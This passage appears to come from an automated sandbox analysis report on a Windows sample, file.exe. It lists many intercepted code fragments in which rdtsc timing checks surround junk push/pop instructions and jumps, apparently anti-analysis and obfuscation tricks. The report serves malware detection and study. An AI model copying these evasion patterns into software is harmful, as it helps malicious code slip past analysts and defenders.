0x00000096 push eax 0x00000097 push edx 0x00000098 push edx 0x00000099 jmp 00007FC070C936FFh 0x0000009e pop edx 0x0000009f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 46DBA3 second address: 46DBA9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5E2A4A second address: 5E2A6B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007FC070C93708h 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5E2A6B second address: 5E2A71 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5E2CF6 second address: 5E2D0B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FC070C936FAh 0x00000008 jg 00007FC070C936F6h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5E6798 second address: 5E679D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5E679D second address: 5E67B2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push esi 0x00000006 pop esi 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push esi 0x0000000e jc 00007FC070C936F6h 0x00000014 pop esi 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5E67B2 second address: 5E67D7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC0712A5391h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [esp+04h] 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007FC0712A538Ah 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5E67D7 second address: 5E67DD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5E686D second address: 5E6906 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pop ebx 0x00000006 add dword ptr [esp], 5271BE3Fh 0x0000000d mov edx, dword ptr [ebp+122D2989h] 0x00000013 or edi, dword ptr [ebp+122D2B29h] 0x00000019 push 00000003h 0x0000001b mov dword ptr [ebp+122D1F29h], ecx 0x00000021 push 00000000h 0x00000023 mov dword ptr [ebp+122D1E21h], ebx 0x00000029 push 00000003h 0x0000002b mov dword ptr [ebp+122D3254h], edi 0x00000031 push 6059E3D9h 0x00000036 jg 00007FC0712A5394h 0x0000003c pushad 0x0000003d jns 00007FC0712A5386h 0x00000043 jc 00007FC0712A5386h 0x00000049 popad 0x0000004a add dword ptr [esp], 5FA61C27h 0x00000051 jmp 00007FC0712A5390h 0x00000056 lea ebx, dword ptr [ebp+1244C6E2h] 0x0000005c mov edx, dword ptr [ebp+122D2CA1h] 0x00000062 xchg eax, ebx 0x00000063 jmp 00007FC0712A538Bh 0x00000068 push eax 0x00000069 push eax 0x0000006a push edx 0x0000006b pushad 0x0000006c jmp 00007FC0712A5399h 0x00000071 pushad 0x00000072 popad 0x00000073 popad 0x00000074 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5E6970 second address: 5E69BD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 popad 0x00000006 mov dword ptr [esp], eax 0x00000009 pushad 0x0000000a or ebx, 3DE8ED85h 0x00000010 add dword ptr [ebp+122D1D52h], esi 0x00000016 popad 0x00000017 sub dword ptr [ebp+122D1BD2h], ecx 0x0000001d push 00000000h 0x0000001f jmp 00007FC070C93709h 0x00000024 call 00007FC070C936F9h 0x00000029 push eax 0x0000002a push edx 0x0000002b jmp 00007FC070C936FAh 0x00000030 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5E69BD second address: 5E69E2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC0712A538Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edi 0x0000000b push ebx 0x0000000c push esi 0x0000000d pop esi 0x0000000e pop ebx 0x0000000f pop edi 0x00000010 mov eax, dword ptr [esp+04h] 0x00000014 push eax 0x00000015 push edx 0x00000016 push ebx 0x00000017 jne 00007FC0712A5386h 0x0000001d pop ebx 0x0000001e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5E69E2 second address: 5E69E7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 605A6D second address: 605A8F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 jmp 00007FC0712A538Bh 0x0000000a pop edx 0x0000000b push eax 0x0000000c push edx 0x0000000d push ecx 0x0000000e jmp 00007FC0712A538Dh 0x00000013 pop ecx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 605A8F second address: 605A94 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 605A94 second address: 605AA3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b push edi 0x0000000c pop edi 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 605D3B second address: 605D45 instructions: 0x00000000 rdtsc 0x00000002 js 00007FC070C93702h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 605D45 second address: 605D5A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007FC0712A5386h 0x0000000a pushad 0x0000000b pushad 0x0000000c popad 0x0000000d jnc 00007FC0712A5386h 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 605D5A second address: 605D8A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a jmp 00007FC070C93702h 0x0000000f pushad 0x00000010 popad 0x00000011 pop eax 0x00000012 jmp 00007FC070C93701h 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 606055 second address: 60606C instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FC0712A538Ch 0x00000008 pushad 0x00000009 je 00007FC0712A5386h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 60606C second address: 6060B1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC070C93705h 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d jmp 00007FC070C93705h 0x00000012 push ebx 0x00000013 jmp 00007FC070C93700h 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 606364 second address: 606368 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 606368 second address: 60636E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 60636E second address: 6063A1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edi 0x00000007 pushad 0x00000008 jns 00007FC0712A5393h 0x0000000e jmp 00007FC0712A5395h 0x00000013 push ebx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6064D9 second address: 6064E1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6064E1 second address: 606505 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jns 00007FC0712A5386h 0x0000000c push ecx 0x0000000d pop ecx 0x0000000e popad 0x0000000f pop esi 0x00000010 pushad 0x00000011 je 00007FC0712A5397h 0x00000017 jmp 00007FC0712A538Bh 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6067C2 second address: 6067CE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6067CE second address: 6067D4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6067D4 second address: 6067DC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6067DC second address: 6067F0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 jns 00007FC0712A538Ch 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 606A84 second address: 606A8E instructions: 0x00000000 rdtsc 0x00000002 jns 00007FC070C936F6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 607445 second address: 607449 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6076FA second address: 607700 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 607700 second address: 607704 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 607704 second address: 607712 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jl 00007FC070C936F6h 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 60C07E second address: 60C082 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 60A95F second address: 60A983 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC070C93706h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push esi 0x0000000b push eax 0x0000000c push edx 0x0000000d jne 00007FC070C936F6h 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 60C16F second address: 60C173 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 60F71B second address: 60F721 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 60F721 second address: 60F72B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 pushad 0x00000007 popad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 60F72B second address: 60F731 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 60F731 second address: 60F747 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jo 00007FC0712A538Ch 0x0000000b jne 00007FC0712A5386h 0x00000011 pushad 0x00000012 push edx 0x00000013 pop edx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 60F747 second address: 60F74D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5DAD02 second address: 5DAD1B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007FC0712A5393h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5DAD1B second address: 5DAD20 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5DAD20 second address: 5DAD5F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007FC0712A5386h 0x0000000a jmp 00007FC0712A5390h 0x0000000f popad 0x00000010 jmp 00007FC0712A5397h 0x00000015 pop edx 0x00000016 pop eax 0x00000017 push eax 0x00000018 push edx 0x00000019 pushad 0x0000001a push ebx 0x0000001b pop ebx 0x0000001c pushad 0x0000001d popad 0x0000001e popad 0x0000001f pushad 0x00000020 push eax 0x00000021 push edx 0x00000022 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5DAD5F second address: 5DAD7B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC070C93705h 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5DAD7B second address: 5DAD81 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5DAD81 second address: 5DAD85 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6122C5 second address: 6122F3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC0712A5394h 0x00000007 jmp 00007FC0712A538Ch 0x0000000c pop edx 0x0000000d pop eax 0x0000000e js 00007FC0712A53A0h 0x00000014 push eax 0x00000015 push edx 0x00000016 push esi 0x00000017 pop esi 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6122F3 second address: 6122F7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6125E8 second address: 612605 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC0712A538Ch 0x00000007 jno 00007FC0712A5386h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f popad 0x00000010 pushad 0x00000011 pushad 0x00000012 pushad 0x00000013 popad 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 612605 second address: 61261E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 je 00007FC070C936FEh 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 61261E second address: 612622 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 612789 second address: 6127B9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC070C936FBh 0x00000009 popad 0x0000000a push edi 0x0000000b pushad 0x0000000c popad 0x0000000d pop edi 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007FC070C93708h 0x00000015 pushad 0x00000016 popad 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 612BC7 second address: 612BCB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 612D24 second address: 612D30 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007FC070C936F6h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 612D30 second address: 612D35 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 612D35 second address: 612D3E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 pushad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5D91AC second address: 5D91D4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC0712A5399h 0x00000007 jo 00007FC0712A5386h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push ecx 0x00000010 push edi 0x00000011 pop edi 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5D91D4 second address: 5D91D9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5D91D9 second address: 5D9204 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC0712A5391h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push edi 0x0000000c pushad 0x0000000d popad 0x0000000e pop edi 0x0000000f jnc 00007FC0712A5390h 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5D9204 second address: 5D921F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FC070C93707h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5D921F second address: 5D9232 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC0712A538Fh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 616948 second address: 61694F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 61694F second address: 616961 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 pushad 0x00000006 popad 0x00000007 pushad 0x00000008 popad 0x00000009 popad 0x0000000a jc 00007FC0712A5392h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 617A4E second address: 617A54 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 617A54 second address: 617A81 instructions: 0x00000000 rdtsc 0x00000002 jne 00007FC0712A5390h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e jmp 00007FC0712A538Eh 0x00000013 jg 00007FC0712A5386h 0x00000019 popad 0x0000001a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 617A81 second address: 617A8B instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FC070C936FCh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 617DE1 second address: 617DE5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 617E4D second address: 617E53 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 618038 second address: 618053 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC0712A5397h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6184D0 second address: 6184E3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007FC070C936F6h 0x0000000a popad 0x0000000b popad 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6184E3 second address: 6184E7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6184E7 second address: 6184EB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6184EB second address: 6184F1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 61856E second address: 618572 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6186E7 second address: 618710 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC0712A5391h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edi 0x0000000a push eax 0x0000000b pushad 0x0000000c jmp 00007FC0712A538Eh 0x00000011 push eax 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6188C7 second address: 6188CB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 618ED6 second address: 618EE0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jno 00007FC0712A5386h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 618EE0 second address: 618EE4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 618EE4 second address: 618EF6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a jc 00007FC0712A538Ch 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 618EF6 second address: 618EFD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 618FB5 second address: 618FB9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 619923 second address: 6199AF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC070C1F319h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a xor dword ptr [ebp+122D2803h], edi 0x00000010 push 00000000h 0x00000012 push 00000000h 0x00000014 push ebp 0x00000015 call 00007FC070C1F308h 0x0000001a pop ebp 0x0000001b mov dword ptr [esp+04h], ebp 0x0000001f add dword ptr [esp+04h], 00000017h 0x00000027 inc ebp 0x00000028 push ebp 0x00000029 ret 0x0000002a pop ebp 0x0000002b ret 0x0000002c mov dword ptr [ebp+1245D1EAh], esi 0x00000032 push 00000000h 0x00000034 push 00000000h 0x00000036 push eax 0x00000037 call 00007FC070C1F308h 0x0000003c pop eax 0x0000003d mov dword ptr [esp+04h], eax 0x00000041 add dword ptr [esp+04h], 00000017h 0x00000049 inc eax 0x0000004a push eax 0x0000004b ret 0x0000004c pop eax 0x0000004d ret 0x0000004e sub dword ptr [ebp+122D1E21h], edi 0x00000054 xchg eax, ebx 0x00000055 pushad 0x00000056 pushad 0x00000057 jmp 00007FC070C1F315h 0x0000005c push eax 0x0000005d push edx 0x0000005e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 61A992 second address: 61A996 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 61A996 second address: 61A99C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 61B4DF second address: 61B4E5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 61BC79 second address: 61BC7D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 61BC7D second address: 61BC83 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 61CA10 second address: 61CA60 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 pop eax 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a nop 0x0000000b mov esi, dword ptr [ebp+122D29AFh] 0x00000011 push 00000000h 0x00000013 or esi, 6511F943h 0x00000019 push 00000000h 0x0000001b push 00000000h 0x0000001d push edi 0x0000001e call 00007FC070C1F308h 0x00000023 pop edi 0x00000024 mov dword ptr [esp+04h], edi 0x00000028 add dword ptr [esp+04h], 0000001Dh 0x00000030 inc edi 0x00000031 push edi 0x00000032 ret 0x00000033 pop edi 0x00000034 ret 0x00000035 and di, 3A52h 0x0000003a push eax 0x0000003b push eax 0x0000003c push edx 0x0000003d push eax 0x0000003e jp 00007FC070C1F306h 0x00000044 pop eax 0x00000045 rdtsc
